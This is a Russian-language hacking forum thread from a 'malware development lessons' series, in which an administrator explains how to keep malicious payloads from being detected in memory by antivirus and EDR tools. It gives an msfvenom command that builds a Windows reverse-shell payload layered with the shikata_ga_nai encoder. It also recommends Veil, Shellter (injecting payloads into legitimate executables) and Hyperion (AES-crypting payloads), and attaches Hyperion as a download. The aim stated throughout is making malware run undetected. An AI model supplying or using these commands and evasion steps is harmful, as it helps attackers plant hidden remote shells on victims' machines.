На заметку Про детект в памяти. Ничего не поделаешь и это неизбежно)


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 125
Репутация
8 243
Всем привет!

Хотел ещё добавить:

Вот в этой теме:Уроки - Разработка вирусов-35.Обход EDRs.Последняя тема цикла

Был поднят вопрос детекта памяти, да можно использовать такие штуки:Уроки - Разработка вирусов-32.Открываем врата ада

Но тем не менее важно что-бы сама нагрузка тоже не палилась, в теме про EDR про это сказано.

Также неплохо, при проектировании вашего основного зверька или полезной нагрузки учитывать методы антиотладки и морфинга самой полезной нагрузки.

Это можно делать прям в памяти, перед запуском, вот например я использовал такой механизм в крипторе:

На вход подаётся бинарный код, на выходе по возможности мутируются, т.е. меняются опкоды на аналоги.
Уже какие-то антивирусы могут не детектить, всё зависит от настройки эвристики антивируса.

Также если у вас есть исходный код нагрузки, можете использовать различные приёмы генерации мусорного кода, например вот:
Техники задержек и прочее как в темах Уроки - Разработка вирусов-30.Черпаем силы в анти-отладке и Уроки - Разработка вирусов-33.Уменьшение вероятности детекта зверька

Если вы-же генерируете нагрузку фреймворками, то обязательно включайте опции обфускации и защиты, вот примеры:

1. Metasploit​

Metasploit также предоставляет различные кодировщики для обфускации payload. Например:

C:
msfvenom -p windows/shell_reverse_tcp LHOST=ВАШ_IP LPORT=4444 -f c -e x86/shikata_ga_nai -i 3

Здесь -e x86/shikata_ga_nai указывает использовать кодировщик shikata_ga_nai, а -i 3 указывает применить кодировщик 3 раза.

shikata_ga_nai — это один из наиболее популярных кодировщиков в Metasploit. Его название происходит от японского выражения "仕方がない", что можно перевести как "ничего не поделаешь" или "это неизбежно".

В контексте Metasploit, shikata_ga_nai используется для обфускации шеллкода с целью избежать обнаружения антивирусами или IDS/IPS системами. Этот кодировщик использует полиморфную технику, что означает, что каждый раз, когда он используется, он генерирует уникальный обфусцированный шеллкод, даже если исходный шеллкод остается неизменным.
Вот некоторые особенности shikata_ga_nai:
  1. Полиморфизм: Каждое обфусцирование уникально.
  2. Размер: Кодировщик может генерировать шеллкоды разного размера, что может быть полезно для эксплуатации различных уязвимостей.
  3. Динамическая настройка ключа: shikata_ga_nai использует динамически изменяющийся ключ для кодирования данных, что делает его сложнее для статического анализа.
  4. Регистровая независимость: Кодировщик спроектирован таким образом, чтобы не зависеть от конкретных регистров, что увеличивает вероятность успешного выполнения шеллкода в различных условиях.
Несмотря на его эффективность, со временем многие современные системы обнаружения угроз стали узнавать паттерны, связанные с этим кодировщиком. Тем не менее, в некоторых сценариях и с правильной комбинацией других техник обфускации, он все еще может быть эффективным.

2. Veil​

— это инструмент для создания обфусцированных payloads, чтобы избежать обнаружения.

Создание и морфинг payload:​

После установки Veil, запустите его:

C:
Veil.py

Итог:

Для обхода детекта в памяти и детекта по поведению, сама нагрузка и итоговый зверек должен быть чистым.
Все остальные инструменты помогают сделать запуск зверька скрытым, но не позволяют избежать поведение связанное с запущенным вредоносным кодом.)
 
Последнее редактирование:

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 125
Репутация
8 243
Ещё интересные инструменты:

— это динамический инжектор payloads для PE-файлов.

Морфинг существующего исполняемого файла:​


Запустите Shellter:
Код:
shellter.exe

Выберите исполняемый файл, который вы хотите "инфицировать", и следуйте инструкциям. Shellter инъектирует payload в существующий PE-файл таким образом, что он остается функциональным, но также выполняет действия payload при запуске.

— это генератор исполняемых файлов для Windows, который создает файлы, кодированные с использованием AES.

Просто передайте ваш исполняемый файл в качестве аргумента для Hyperion:

C:
Hyperion.exe ВашПуть/к/Payload.exe PayloadEncrypted.exe

Это создаст новый исполняемый файл PayloadEncrypted.exe, который при запуске раскодирует и выполняет исходный payload.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 125
Репутация
8 243
— это генератор исполняемых файлов для Windows, который создает файлы, кодированные с использованием AES.
 

Вложения

  • Hyperion-2.2.zip
    281.9 КБ · Просмотры: 13

HMCoba

Активный пользователь
Активный
Регистрация
22.04.2023
Сообщения
186
Репутация
139
Спасибо за инфо, как раз то что нужно.
 
Автор темы Похожие темы Форум Ответы Дата
X-Shar Введение в разработку вредоносных программ 4
X-Shar Введение в разработку вредоносных программ 0
X-Shar Введение в разработку вредоносных программ 0
X-Shar Введение в разработку вредоносных программ 1
X-Shar Введение в разработку вредоносных программ 0
X-Shar Введение в разработку вредоносных программ 2
Бюджетный Бюджет Введение в разработку вредоносных программ 1
X-Shar Введение в разработку вредоносных программ 0
X-Shar Введение в разработку вредоносных программ 7
X-Shar Введение в разработку вредоносных программ 8
Верх Низ